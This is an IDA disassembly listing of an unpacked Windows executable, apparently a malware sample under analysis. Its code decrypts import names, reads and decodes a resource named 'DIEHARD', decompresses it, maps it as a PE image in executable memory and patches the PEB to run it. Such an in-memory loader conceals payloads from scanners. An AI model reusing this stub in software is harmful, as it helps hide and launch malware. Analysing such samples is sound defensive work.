;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B330FC18D528CCC20072561641D064C1
; File Name : u:\work\b330fc18d528ccc20072561641d064c1_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000006A6 ( 1702.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: start+55�p start+71�p
; DATA XREF: ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: start+39�p
; DATA XREF: start+39�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: .text:004010D6�p
; DATA XREF: .text:004010D6�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401010h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near
sub esi, 14h
dec ecx
mov edi, offset byte_40162F
sub edi, offset byte_40157F
push edi
push offset byte_40157F
mov ebx, offset dword_402000
push ebx
call sub_4010DC
push edi
add ecx, ebx
sub ecx, ebx
push ebx
call sub_401483
mov esi, offset dword_402000
mov edi, esi
push esi
push edi
push edi
add esi, 3
push esi ; lpLibFileName
call ds:LoadLibraryA
mov hModule, eax
pop esi
movzx eax, ds:byte_401569
add esi, eax
push esi ; lpProcName
push hModule ; hModule
call ds:GetProcAddress
mov dword_402138, eax
pop esi
movzx eax, ds:byte_40156A
add esi, eax
push esi ; lpProcName
push hModule ; hModule
call ds:GetProcAddress
mov dword_40213C, eax
pop esi
push offset hModule
add esi, 3
push esi
call sub_401349
push 0
call dword_40214C
mov dword_4020F4, eax
call sub_40122B
call sub_4013AA
push dword_40211C
call sub_40115B
inc eax
inc eax
push eax
push dword_402130
call sub_4010F4
call sub_4014B3
call sub_4012EA
retn
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call ds:ExitProcess
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010DC proc near ; CODE XREF: start+1B�p sub_40115B+3E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
xor eax, eax
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
rep movsb
pop edi
pop esi
leave
retn 0Ch
sub_4010DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010F4 proc near ; CODE XREF: start+B6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, esi
add eax, 3Ch
mov eax, [eax]
add eax, esi
add eax, 80h
mov ebx, [eax]
add ebx, esi
loc_401112: ; CODE XREF: sub_4010F4+5E�j
mov eax, [ebx+0Ch]
add eax, [ebp+arg_0]
push eax
call dword_402138
mov [ebp+var_4], eax
mov esi, [ebx]
add esi, [ebp+arg_0]
mov edi, [ebx+10h]
add edi, [ebp+arg_0]
loc_40112D: ; CODE XREF: sub_4010F4+55�j
mov ecx, [esi]
add ecx, [ebp+arg_0]
inc ecx
inc ecx
push ecx
push [ebp+var_4]
call dword_40213C
mov [edi], eax
add esi, 4
add edi, 4
cmp dword ptr [esi], 0
jnz short loc_40112D
add ebx, 14h
cmp dword ptr [ebx+0Ch], 0
jnz short loc_401112
pop edi
pop esi
pop ebx
leave
retn 4
sub_4010F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40115B proc near ; CODE XREF: start+A8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebx+3Ch]
add ebx, esi
push dword ptr [ebx+34h]
pop dword_402130
xor eax, eax
mov al, [ebx+6]
mov [ebp+var_4], eax
push 40h
push 3000h
push dword ptr [ebx+50h]
push dword ptr [ebx+34h]
call dword_402148
mov esi, eax
push dword ptr [ebx+54h]
push [ebp+arg_0]
push esi
call sub_4010DC
lea edi, [ebx+0F8h]
loc_4011A4: ; CODE XREF: sub_40115B+72�j
mov eax, [ebp+arg_0]
add eax, [edi+14h]
mov ecx, esi
add ecx, [edi+0Ch]
cmp dword ptr [edi], 7461642Eh
jnz short loc_4011BD
mov dword_402134, ecx
loc_4011BD: ; CODE XREF: sub_40115B+5A�j
push dword ptr [edi+10h]
push eax
push ecx
call sub_4010DC
add edi, 28h
dec [ebp+var_4]
jnz short loc_4011A4
mov eax, [ebx+28h]
add eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
sub_40115B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011DB proc near ; CODE XREF: sub_4013AA+65�p
; sub_4013AA+9E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, offset dword_402000
mov eax, [ebp+arg_0]
mov ebx, dword_402110
mov ecx, 0A0h
mul ecx
add ebx, eax
movzx ecx, byte ptr [ebx]
inc ecx
mov esi, ebx
rep movsb
pop edi
pop esi
pop ebx
leave
retn 4
sub_4011DB endp
; =============== S U B R O U T I N E =======================================
sub_401207 proc near ; CODE XREF: sub_4013AA+A3�p
; sub_4013AA+C4�p
push ebx
mov ebx, offset dword_402000
inc byte ptr [ebx]
movzx ecx, byte ptr [ebx]
add ebx, ecx
mov al, byte_40216C
mov [ebx], al
pop ebx
retn
sub_401207 endp
; =============== S U B R O U T I N E =======================================
sub_40121D proc near ; CODE XREF: sub_4013AA+6F�p
; sub_4013AA+B7�p
mov ecx, offset dword_402000
inc ecx
mov al, [ecx]
mov byte_40216C, al
retn
sub_40121D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40122B proc near ; CODE XREF: start+98�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
mov [ebp+var_8], 48454944h
mov [ebp+var_4], 445241h
lea eax, [ebp+var_8]
push eax
mov eax, 4
push eax
push dword_4020F4
call dword_40215C
mov dword_4020F8, eax
push eax
push dword_4020F4
call dword_402168
mov dword_402108, eax
shl eax, 3
mov dword_40210C, eax
push dword_4020F8
push dword_4020F4
call dword_402160
mov esi, eax
xor ebx, ebx
push ebx
push ebx
push 1
call dword_402154
mov dword_402124, eax
push dword_402108
push 8
push eax
call dword_402150
mov dword_402100, eax
add eax, dword_402108
mov dword_402104, eax
push dword_402108
push esi
push dword_402100
call sub_4010DC
mov ebx, dword_402100
mov ecx, dword_402108
loc_4012D8: ; CODE XREF: sub_40122B+B2�j
sub byte ptr [ebx], 12h
inc ebx
dec ecx
jnz short loc_4012D8
add dword_402100, 2
pop esi
pop ebx
leave
retn
sub_40122B endp
; =============== S U B R O U T I N E =======================================
sub_4012EA proc near ; CODE XREF: start+C0�p
push ebx
mov eax, large fs:18h
mov eax, [eax+30h]
mov ebx, dword_402130
mov [eax+8], ebx
pop ebx
retn
sub_4012EA endp
; =============== S U B R O U T I N E =======================================
sub_4012FF proc near ; CODE XREF: sub_4013AA+C9�p
push ebx
mov eax, dword_402114
mov ebx, dword_402110
mov ecx, 0A0h
mul ecx
add ebx, eax
mov esi, offset dword_402000
movzx ecx, byte ptr [esi]
inc esi
mov [ebx], cl
inc ebx
mov edi, ebx
rep movsb
inc dword_402114
call sub_401331
pop ebx
retn
sub_4012FF endp
; =============== S U B R O U T I N E =======================================
sub_401331 proc near ; CODE XREF: sub_4012FF+2B�p
xor ecx, ecx
mov edx, dword_402114
inc edx
inc edx
loc_40133B: ; CODE XREF: sub_401331+F�j
inc ecx
sar edx, 1
test edx, edx
jnz short loc_40133B
mov dword_402118, ecx
retn
sub_401331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401349 proc near ; CODE XREF: start+86�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
mov ecx, [ebp+arg_0]
mov esi, ecx
dec ecx
dec ecx
movzx ecx, byte ptr [ecx]
mov [ebp+var_4], ecx
mov edi, [ebp+arg_4]
loc_401362: ; CODE XREF: sub_401349+4A�j
push esi
call dword_402138
mov ebx, eax
mov [edi], ebx
add edi, 4
call sub_40139E
loc_401375: ; CODE XREF: sub_401349+40�j
push esi
push ebx
call dword_40213C
mov [edi], eax
add edi, 4
call sub_40139E
cmp al, 0
jnz short loc_401375
inc esi
dec [ebp+var_4]
cmp [ebp+var_4], 0
jnz short loc_401362
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 8
sub_401349 endp
; =============== S U B R O U T I N E =======================================
sub_40139E proc near ; CODE XREF: sub_401349+27�p
; sub_401349+39�p ...
inc esi
cmp byte ptr [esi], 0
jnz short sub_40139E
inc esi
xor eax, eax
mov al, [esi]
retn
sub_40139E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013AA proc near ; CODE XREF: start+9D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
push ebx
xor ebx, ebx
mov eax, ebx
push eax
push eax
push 1
call dword_402154
mov dword_402128, eax
push 0EA60h
push 8
push eax
call dword_402150
mov dword_40211C, eax
push ebx
push ebx
push 1
call dword_402154
mov dword_40212C, eax
push 0C35000h
push 8
push eax
call dword_402150
mov dword_402110, eax
call sub_401547
push 9
pop dword_402118
call sub_4014CC
mov [ebp+var_8], eax
push eax
call sub_4011DB
call sub_40151F
call sub_40121D
loc_40141E: ; CODE XREF: sub_4013AA+D4�j
mov esi, dword_40210C
sub esi, dword_4020FC
cmp esi, dword_402118
jl short loc_401480
call sub_4014CC
mov [ebp+var_4], eax
mov ebx, dword_402114
dec ebx
cmp eax, ebx
jle short loc_401454
push [ebp+var_8]
call sub_4011DB
call sub_401207
jmp short loc_40145C
; ---------------------------------------------------------------------------
loc_401454: ; CODE XREF: sub_4013AA+99�j
push [ebp+var_4]
call sub_4011DB
loc_40145C: ; CODE XREF: sub_4013AA+A8�j
call sub_40151F
call sub_40121D
push [ebp+var_8]
call sub_4011DB
call sub_401207
call sub_4012FF
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_40141E
; ---------------------------------------------------------------------------
loc_401480: ; CODE XREF: sub_4013AA+86�j
pop ebx
leave
retn
sub_4013AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401483 proc near ; CODE XREF: start+26�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
push ebx
push edi
mov edi, offset byte_40156B
mov ebx, [ebp+arg_0]
mov eax, [ebp+arg_4]
loc_401496: ; CODE XREF: sub_401483+21�j
; sub_401483+28�j
mov cl, [edi]
cmp cl, 0
jz short loc_4014A6
xor [ebx], cl
dec eax
jz short loc_4014AD
inc ebx
inc edi
jmp short loc_401496
; ---------------------------------------------------------------------------
loc_4014A6: ; CODE XREF: sub_401483+18�j
mov edi, offset byte_40156B
jmp short loc_401496
; ---------------------------------------------------------------------------
loc_4014AD: ; CODE XREF: sub_401483+1D�j
pop edi
pop ebx
leave
retn 8
sub_401483 endp
; =============== S U B R O U T I N E =======================================
sub_4014B3 proc near ; CODE XREF: start+BB�p
push dword_402128
call dword_402158
push dword_40212C
call dword_402158
retn
sub_4014B3 endp
; =============== S U B R O U T I N E =======================================
sub_4014CC proc near ; CODE XREF: sub_4013AA+5C�p
; sub_4013AA+88�p
push ebx
push esi
push edi
push 20h
xor edx, edx
pop ecx
mov eax, dword_4020FC
mov ebx, dword_402100
div ecx
shl eax, 2
add ebx, eax
mov edi, dword_402118
push edi
xor eax, eax
loc_4014EF: ; CODE XREF: sub_4014CC+46�j
dec edi
mov esi, [ebx]
bswap esi
mov cl, dl
shl esi, cl
shr esi, 1Fh
test esi, esi
jz short loc_401505
mov ecx, edi
shl esi, cl
add eax, esi
loc_401505: ; CODE XREF: sub_4014CC+31�j
inc edx
cmp edx, 20h
jnz short loc_401510
add ebx, 4
xor edx, edx
loc_401510: ; CODE XREF: sub_4014CC+3D�j
test edi, edi
jnz short loc_4014EF
pop ecx
add dword_4020FC, ecx
pop edi
pop esi
pop ebx
retn
sub_4014CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40151F proc near ; CODE XREF: sub_4013AA+6A�p
; sub_4013AA:loc_40145C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, dword_40211C
add edi, dword_402120
mov esi, offset dword_402000
movzx ecx, byte ptr [esi]
add dword_402120, ecx
inc esi
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_40151F endp
; =============== S U B R O U T I N E =======================================
sub_401547 proc near ; CODE XREF: sub_4013AA+4F�p
push ebx
mov ebx, dword_402110
xor ecx, ecx
mov ch, 1
loc_401552: ; CODE XREF: sub_401547+18�j
mov [ebx], ch
mov [ebx+1], cl
add ebx, 0A0h
inc cl
jnz short loc_401552
mov dword_402114, ecx
pop ebx
retn
sub_401547 endp
; ---------------------------------------------------------------------------
byte_401569 db 94h ; DATA XREF: start+45�r
byte_40156A db 0A1h ; DATA XREF: start+61�r
byte_40156B db 0EAh ; DATA XREF: sub_401483+8�o
; sub_401483:loc_4014A6�o
dd 2A533B4Eh, 2E567B35h, 5E3F0593h, 0FB2229Ch
db 44h, 2 dup(0)
byte_40157F db 0EAh ; DATA XREF: start+9�o start+10�o
dd 4F383B4Fh, 42331547h, 3A1137A0h, 48B24EF0h, 521A9E21h
dd 14764130h, 5E74023h, 56EE3769h, 0AB286EC7h, 493C5722h
dd 5A333C35h, 2B5B6ADEh, 6EFA47F0h, 5E228E2Ah, 1E7D2A12h
dd 69D25E37h, 22FF3153h, 9A256AFAh, 4B36490Dh, 66561E41h
dd 1A4F64F6h, 7DC651F9h, 7D4E932Bh, 2951443Ah, 70FC5D33h
dd 63F93D4Dh, 8B2B43B2h, 5936692Ah, 4D240E5Ah, 317305F6h
dd 6AE049FFh, 493B8537h, 28354F30h, 6AF6543Fh, 51F90C59h
dd 89367ADDh, 66533B2Bh, 62321A5Ah, 3F4D67FAh, 0FF35BEEh
dd 6B3A8F03h, 3A564521h, 60E14A32h
db 4Ch, 2Dh, 9Ch
byte_40162F db 22h ; DATA XREF: start+4�o
dd 1658h, 2 dup(0)
dd 1698h, 1000h, 5 dup(0)
dd 1676h, 1688h, 1668h, 0
dd 78450075h, 72507469h, 7365636Fh, 1290073h, 50746547h
dd 41636F72h, 65726464h, 7373h, 6F4C01A9h, 694C6461h, 72617262h
dd 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh, 57h dup(0)
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 0000016D ( 365.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 402000h
dword_402000 dd 3Dh dup(?) ; DATA XREF: start+15�o start+2B�o ...
dword_4020F4 dd ? ; DATA XREF: start+93�w sub_40122B+20�r ...
dword_4020F8 dd ? ; DATA XREF: sub_40122B+2C�w
; sub_40122B+4B�r
dword_4020FC dd ? ; DATA XREF: sub_4013AA+7A�r
; sub_4014CC+8�r ...
dword_402100 dd ? ; DATA XREF: sub_40122B+7F�w
; sub_40122B+96�r ...
dword_402104 dd ? ; DATA XREF: sub_40122B+8A�w
dword_402108 dd ? ; DATA XREF: sub_40122B+3E�w
; sub_40122B+70�r ...
dword_40210C dd ? ; DATA XREF: sub_40122B+46�w
; sub_4013AA:loc_40141E�r
dword_402110 dd ? ; DATA XREF: sub_4011DB+E�r
; sub_4012FF+6�r ...
dword_402114 dd ? ; DATA XREF: sub_4012FF+1�r
; sub_4012FF+25�w ...
dword_402118 dd ? ; DATA XREF: sub_401331+11�w
; sub_4013AA+56�w ...
dword_40211C dd ? ; DATA XREF: start+A2�r sub_4013AA+28�w ...
dword_402120 dd ? ; DATA XREF: sub_40151F+C�r
; sub_40151F+1A�w
dword_402124 dd ? ; DATA XREF: sub_40122B+6B�w
dword_402128 dd ? ; DATA XREF: sub_4013AA+15�w
; sub_4014B3�r
dword_40212C dd ? ; DATA XREF: sub_4013AA+37�w
; sub_4014B3+C�r
dword_402130 dd ? ; DATA XREF: start+B0�r sub_40115B+14�w ...
dword_402134 dd ? ; DATA XREF: sub_40115B+5C�w
dword_402138 dd ? ; DATA XREF: start+5B�w sub_4010F4+25�r ...
dword_40213C dd ? ; DATA XREF: start+77�w sub_4010F4+44�r ...
; HMODULE hModule
hModule dd ? ; DATA XREF: start+3F�w start+4F�r ...
align 8
dword_402148 dd ? ; DATA XREF: sub_40115B+2F�r
dword_40214C dd ? ; DATA XREF: start+8D�r
dword_402150 dd ? ; DATA XREF: sub_40122B+79�r
; sub_4013AA+22�r ...
dword_402154 dd ? ; DATA XREF: sub_40122B+65�r
; sub_4013AA+F�r ...
dword_402158 dd ? ; DATA XREF: sub_4014B3+6�r
; sub_4014B3+12�r
dword_40215C dd ? ; DATA XREF: sub_40122B+26�r
dword_402160 dd ? ; DATA XREF: sub_40122B+57�r
align 8
dword_402168 dd ? ; DATA XREF: sub_40122B+38�r
byte_40216C db ? ; DATA XREF: sub_401207+D�r
; sub_40121D+8�w
_data ends
end start